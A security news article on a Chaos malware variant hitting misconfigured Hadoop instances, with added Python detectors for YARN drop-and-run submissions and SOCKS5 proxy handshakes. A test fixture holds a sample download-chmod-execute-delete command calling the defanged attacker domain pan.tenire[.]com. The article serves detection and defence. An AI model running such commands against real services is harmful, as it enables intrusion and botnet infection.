Chaos Malware Evolves, Now Targeting Misconfigured Cloud Deployments
A new variant of the **Chaos** malware is actively targeting misconfigured cloud deployments, signaling a significant shift in the botnet's tactics. Cybersecurity researchers at **Darktrace** have identified this evolution, noting its expansion beyond traditional targets like routers and edge devices.

Cybersecurity researchers have discovered a new variant of the **Chaos** malware that's capable of hitting misconfigured cloud deployments, marking an expansion of the botnet's target set.
"Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices," **Darktrace** said in a new report.
### Chaos: An Overview
**Chaos** was first documented by **Lumen Black Lotus Labs** in September 2022. It's a cross-platform malware capable of targeting Windows and Linux environments. Its capabilities include running remote shell commands, dropping additional modules, propagating to other hosts by brute-forcing SSH keys, mining cryptocurrency, and launching distributed denial-of-service (DDoS) attacks via HTTP, TLS, TCP, UDP, and WebSocket.
The malware is assessed to be an evolution of another DDoS malware known as **Kaiji** that has singled out misconfigured Docker instances. The actor behind this operation is currently unknown, but the presence of Chinese language characters and the use of China-based infrastructure suggest that the threat actor could be of Chinese origin.
### Targeting Hadoop Deployments
**Darktrace** identified the new variant targeting its honeypot network last month, specifically a deliberately misconfigured Hadoop instance that enables remote code execution on the service. The attack commenced with an HTTP request to the Hadoop deployment to create a new application.
The application embedded a sequence of shell commands to retrieve a **Chaos** agent binary from an attacker-controlled server ("pan.tenire[.]com"), set permissions to allow all users to read, modify, or run it ("chmod 777"), and then execute the binary and delete the artifact from disk to minimize the forensic trail.
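The attack chain above (an application-submission request whose launch command fetches a binary, makes it world-writable and executable, runs it and deletes it) is a pattern defenders can look for in Hadoop ResourceManager access or honeypot logs. The following Python is an added example, not code from Darktrace's report or from the Hadoop project. It assumes the submission bodies have the shape of the YARN REST API's `POST /ws/v1/cluster/apps` request (with the command under `am-container-spec.commands.command`); the two sample submissions, their application ids and the URL path are constructed for the example, with only the domain taken from the article.

```python
import json
import re

# Constructed sample payloads in the shape of a YARN ResourceManager application
# submission (POST /ws/v1/cluster/apps). The first mirrors the fetch / chmod 777 /
# run / delete chain described in the article; the second is a benign MapReduce job.
# Application ids and the URL path are placeholders, not real observations.
SAMPLE_SUBMISSIONS = [
    {
        "application-id": "application_0000000000000_0001",
        "application-name": "update",
        "application-type": "YARN",
        "am-container-spec": {
            "commands": {
                "command": (
                    "cd /tmp; wget http://pan.tenire[.]com/PLACEHOLDER -O .x; "
                    "chmod 777 .x; ./.x; rm -f .x"
                )
            }
        },
    },
    {
        "application-id": "application_0000000000000_0002",
        "application-name": "wordcount",
        "application-type": "MAPREDUCE",
        "am-container-spec": {
            "commands": {
                "command": (
                    "$JAVA_HOME/bin/java -Xmx1024m "
                    "org.apache.hadoop.examples.WordCount /data/in /data/out"
                )
            }
        },
    },
]

# One regex per stage of the chain. Any single stage also occurs in legitimate
# jobs; the combination of fetching and then executing is what the rule alerts on.
STAGE_PATTERNS = {
    "download": re.compile(r"\b(?:wget|curl|tftp)\b"),
    "permissions": re.compile(r"\bchmod\s+(?:[0-7]{3,4}|[ugoa]*\+[rwxst]*x)\b"),
    "execute": re.compile(r"(?:^|[;&|]\s*)(?:\./\S+|(?:sh|bash)\s+\S+)"),
    "cleanup": re.compile(r"\brm\s+(?:-\w+\s+)*\S+"),
}
# Matches live and defanged ("[.]") URLs so the rule also works on report data.
URL_PATTERN = re.compile(r"(?:https?|ftp)://[^\s;|&'\"]+")


def extract_command(submission: dict) -> str:
    """Return the ApplicationMaster launch command from a submission body."""
    spec = submission.get("am-container-spec") or {}
    command = (spec.get("commands") or {}).get("command", "")
    # YARN takes a single string here; tolerate a list for robustness.
    return command if isinstance(command, str) else " ".join(map(str, command))


def analyze_submission(submission: dict) -> dict:
    """Score one submission against the fetch-chmod-run-delete chain."""
    command = extract_command(submission)
    stages = [name for name, pattern in STAGE_PATTERNS.items() if pattern.search(command)]
    return {
        "application-id": submission.get("application-id"),
        "stages": stages,
        "urls": URL_PATTERN.findall(command),
        # Download + execute is the minimum for a drop-and-run; chmod and rm
        # raise confidence, but a variant may omit either one.
        "flagged": "download" in stages and "execute" in stages,
    }


def flagged_application_ids(submissions) -> list:
    """Ids of every submission that trips the rule, in log order."""
    return [r["application-id"] for r in map(analyze_submission, submissions) if r["flagged"]]


if __name__ == "__main__":
    for submission in SAMPLE_SUBMISSIONS:
        print(json.dumps(analyze_submission(submission), indent=2))
```

Because the honeypot instance in the report was deliberately exposed, the real fix is upstream of this rule: a ResourceManager that accepts unauthenticated application submissions from the internet will run whatever command is supplied, so the detection is a safety net behind network restriction and authentication, not a substitute for them.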
### Connection to Silver Fox
Interestingly, the domain used in the attack was previously associated with an email phishing campaign carried out by the Chinese cybercrime group **Silver Fox** to deliver decoy documents and ValleyRAT malware. This campaign was codenamed Operation Silk Lure by **Seqrite Labs** in October 2025.
### Updated Capabilities
The 64-bit ELF binary is a restructured and updated version of **Chaos** that reworks several of its functions, while keeping most of its core feature set intact. A significant change is the removal of functions that enabled it to spread via SSH and exploit router vulnerabilities.
Taking their place is a new SOCKS proxy feature that allows the compromised system to be used for ferrying traffic, thereby concealing the true origins of malicious activity and making it harder for defenders to detect and block the attack.
"In addition, several functions that were previously believed to be inherited from **Kaiji** have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively," **Darktrace** added.
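A compromised cloud host that starts brokering SOCKS connections for others is visible on the wire even when the binary itself has been deleted: the handshake has a fixed layout. The Python below is an added example, not code from Darktrace or from the malware analysis, and it assumes the proxy feature speaks standard SOCKS5 (RFC 1928), which the article does not state (it only says "SOCKS"). It parses a reassembled client/server byte stream and reports the negotiated authentication method and the requested destination; the sample flows are constructed.

```python
import ipaddress
import struct

SOCKS_VERSION = 0x05
COMMANDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}
AUTH_METHODS = {0x00: "no-auth", 0x02: "username/password", 0xFF: "no-acceptable"}


def parse_socks5_flow(client: bytes, server: bytes):
    """Return handshake details if the flow is a SOCKS5 session, else None.

    RFC 1928 layout: client greeting VER NMETHODS METHODS..., server choice
    VER METHOD, then client request VER CMD RSV ATYP DST.ADDR DST.PORT.
    """
    if len(client) < 3 or client[0] != SOCKS_VERSION:
        return None
    nmethods = client[1]
    if nmethods == 0 or len(client) < 2 + nmethods:
        return None
    offered = list(client[2:2 + nmethods])
    if len(server) < 2 or server[0] != SOCKS_VERSION:
        return None
    chosen = server[1]
    result = {
        "offered_auth": [AUTH_METHODS.get(m, hex(m)) for m in offered],
        "chosen_auth": AUTH_METHODS.get(chosen, hex(chosen)),
        "command": None,
        "dst_host": None,
        "dst_port": None,
    }
    request = client[2 + nmethods:]
    # Only the no-auth path is parsed further: with username/password (0x02) a
    # sub-negotiation precedes the request, and that exchange is not handled here.
    if chosen != 0x00 or len(request) < 4 or request[0] != SOCKS_VERSION:
        return result
    cmd, atyp = request[1], request[3]
    result["command"] = COMMANDS.get(cmd, hex(cmd))
    body = request[4:]
    host = port = None
    if atyp == 0x01 and len(body) >= 6:                       # IPv4
        host = str(ipaddress.IPv4Address(bytes(body[:4])))
        port = struct.unpack("!H", body[4:6])[0]
    elif atyp == 0x03 and len(body) >= 1 and len(body) >= 3 + body[0]:  # domain name
        n = body[0]
        host = body[1:1 + n].decode("ascii", "replace")
        port = struct.unpack("!H", body[1 + n:3 + n])[0]
    elif atyp == 0x04 and len(body) >= 18:                    # IPv6
        host = str(ipaddress.IPv6Address(bytes(body[:16])))
        port = struct.unpack("!H", body[16:18])[0]
    result["dst_host"], result["dst_port"] = host, port
    return result


def build_connect_flow(host: str, port: int):
    """Construct a no-auth SOCKS5 CONNECT session (client bytes, server bytes)."""
    greeting = bytes([SOCKS_VERSION, 1, 0x00])
    host_bytes = host.encode("ascii")
    request = (bytes([SOCKS_VERSION, 0x01, 0x00, 0x03, len(host_bytes)])
               + host_bytes + struct.pack("!H", port))
    # Server: accept no-auth, then reply "succeeded" with a zero bind address.
    server = bytes([SOCKS_VERSION, 0x00]) + bytes([SOCKS_VERSION, 0x00, 0x00, 0x01]) + b"\x00" * 6
    return greeting + request, server


# Constructed flows: one relayed session and one ordinary HTTP exchange.
SAMPLE_FLOWS = {
    "relayed": build_connect_flow("example.com", 443),
    "plain_http": (b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n", b"HTTP/1.1 200 OK\r\n\r\n"),
}


def find_proxy_sessions(flows: dict) -> dict:
    """Map flow name -> parsed handshake for every flow that looks like SOCKS5."""
    found = {}
    for name, (client, server) in flows.items():
        parsed = parse_socks5_flow(client, server)
        if parsed is not None:
            found[name] = parsed
    return found


if __name__ == "__main__":
    for name, info in find_proxy_sessions(SAMPLE_FLOWS).items():
        print(name, info)
```

Run over inbound flows to hosts that have no business accepting proxy clients (a Hadoop node, for example), any hit is worth an alert; the destination host and port also give the investigator the victim-facing side of the relayed traffic, which the proxy otherwise hides.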
### Monetization and Future Threats
The addition of the proxy feature suggests that the threat actors behind the malware are looking to further monetize the botnet beyond cryptocurrency mining and DDoS-for-hire, and keep up with their competitors in the cybercrime market by offering a diverse slate of illicit services.
"While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal," **Darktrace** concluded. "The recent shift in botnets such as AISURU and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams."